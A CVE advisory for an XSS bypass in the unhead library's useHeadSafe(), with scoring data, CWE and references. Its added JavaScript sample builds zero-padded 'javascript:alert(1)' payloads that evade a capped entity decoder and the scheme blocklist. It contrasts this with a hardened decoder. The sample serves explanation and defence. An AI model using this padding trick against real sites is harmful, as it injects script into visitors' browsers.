CVE-2026-39315

Published: Apr 09, 2026 Last Modified: Apr 14, 2026
Base Score: 6.1 (MEDIUM)
Attack Vector: network
Attack Complexity: low
Privileges Required: none
User Interaction: required
Scope: changed
Confidentiality: low
Integrity: low
Availability: none

Description


Unhead is a document head and template manager. Prior to 2.1.13, useHeadSafe(), the composable that Nuxt's own documentation explicitly recommends for rendering user-supplied content in <head> safely, can be bypassed. Internally, the hasDangerousProtocol() function in packages/unhead/src/plugins/safe.ts decodes HTML entities before checking the result for blocked URI schemes (javascript:, data:, vbscript:). The decoder uses two regular expressions with fixed-width caps on the number of digits they accept in a numeric character reference. The HTML5 specification imposes no limit on leading zeros in numeric character references, so a reference padded with more zeros than the regex cap allows (for example, a zero-padded form of &#106;, the letter j) is silently left undecoded. The still-encoded string is then passed to startsWith('javascript:'), which does not match, and makeTagSafe() writes the raw value directly into the SSR HTML output. The browser's HTML parser decodes the padded entity natively and constructs the blocked URI. This vulnerability is fixed in 2.1.13.
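The following JavaScript is an added illustration of the bypass pattern described above; it is not unhead's code and not the patch shipped in 2.1.13. It models a deliberately capped entity decoder (the caps of 7 decimal and 6 hexadecimal digits are assumptions chosen for the example, not unhead's actual values) next to an unbounded decoder that follows the HTML5 tokenizer rules a browser applies, and runs both against a zero-padded javascript: payload. Function names and the blocked-scheme list are likewise the example's own.

```javascript
// Added example for CVE-2026-39315 (constructed, not unhead code).
// Shows how a digit cap in a numeric-character-reference decoder lets a
// zero-padded entity slip past a startsWith() scheme blocklist, while the
// browser's parser, which has no such cap, still decodes it.

const BLOCKED_SCHEMES = ['javascript:', 'data:', 'vbscript:'];

// Map a code point to a string the way the HTML parser does: out-of-range
// or surrogate values become U+FFFD instead of throwing.
function codePointToString(cp) {
  const valid = Number.isFinite(cp) && cp >= 0 && cp <= 0x10ffff &&
    !(cp >= 0xd800 && cp <= 0xdfff);
  return valid ? String.fromCodePoint(cp) : '\uFFFD';
}

// Vulnerable decoder (assumed caps: 7 decimal digits, 6 hex digits).
// A reference with more digits matches neither regex and is left untouched.
function decodeEntitiesCapped(str) {
  return str
    .replace(/&#(\d{1,7});/g, (_, d) => codePointToString(Number(d)))
    .replace(/&#x([0-9a-f]{1,6});/gi, (_, h) => codePointToString(parseInt(h, 16)));
}

// Hardened decoder: any number of digits, leading zeros included, and the
// terminating semicolon optional (browsers decode "&#106" as a parse error).
// This is one possible fix, not the change made in unhead 2.1.13.
function decodeEntitiesUnbounded(str) {
  return str
    .replace(/&#(\d+);?/g, (_, d) => codePointToString(Number(d)))
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => codePointToString(parseInt(h, 16)));
}

// The check under test: decode first, then compare against the blocklist.
function hasDangerousProtocol(value, decode) {
  const decoded = decode(value).trim().toLowerCase();
  return BLOCKED_SCHEMES.some((scheme) => decoded.startsWith(scheme));
}

// Encode every character of `text` as a numeric reference zero-padded to
// `width` digits, in decimal (base 10) or hexadecimal (base 16).
function padEntity(text, width, base = 10) {
  return [...text].map((ch) => {
    const digits = ch.codePointAt(0).toString(base).padStart(width, '0');
    return base === 16 ? `&#x${digits};` : `&#${digits};`;
  }).join('');
}

// Constructed payloads: "javascript:" with each letter padded past the caps.
const decPayload = padEntity('javascript:', 10) + 'alert(1)';
const hexPayload = padEntity('javascript:', 8, 16) + 'alert(1)';

// Stand-alone demonstration.
console.log(decPayload);
console.log('capped decoder blocks decimal payload:   ', hasDangerousProtocol(decPayload, decodeEntitiesCapped));
console.log('unbounded decoder blocks decimal payload:', hasDangerousProtocol(decPayload, decodeEntitiesUnbounded));
console.log('capped decoder blocks hex payload:       ', hasDangerousProtocol(hexPayload, decodeEntitiesCapped));
console.log('browser-equivalent decoding:             ', decodeEntitiesUnbounded(decPayload));
```

The unpadded form (&#106;avascript:) is caught by both decoders, which is why the cap only shows up when an attacker pads the reference; any scheme check that normalizes before comparing must normalize at least as permissively as the consumer that will finally interpret the value.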

EPSS (Exploit Prediction Scoring System)

Predicts the probability of exploitation based on threat intelligence and the characteristics of the vulnerability.

EPSS Score: 0.0005
Percentile: 0.1th


CWE-184: Incomplete List of Disallowed Inputs (status: Draft)

Common Consequences
Security Scopes Affected: Access Control
Potential Impacts: Bypass Protection Mechanism
Applicable Platforms: All platforms may be affected
Application

Unhead by Unjs
Version Range Affected: to 2.1.13 (exclusive)
CPE: cpe:2.3:a:unjs:unhead:*:*:*:*:*:node.js:*:*
References

https://github.com/unjs/unhead/security/advisories/GHSA-95h2-gj7x-gx9w
https://github.com/unjs/unhead/commit/961ea781e091853812ffe17f8cda17105d2d2299
https://github.com/unjs/unhead/releases/tag/v2.1.13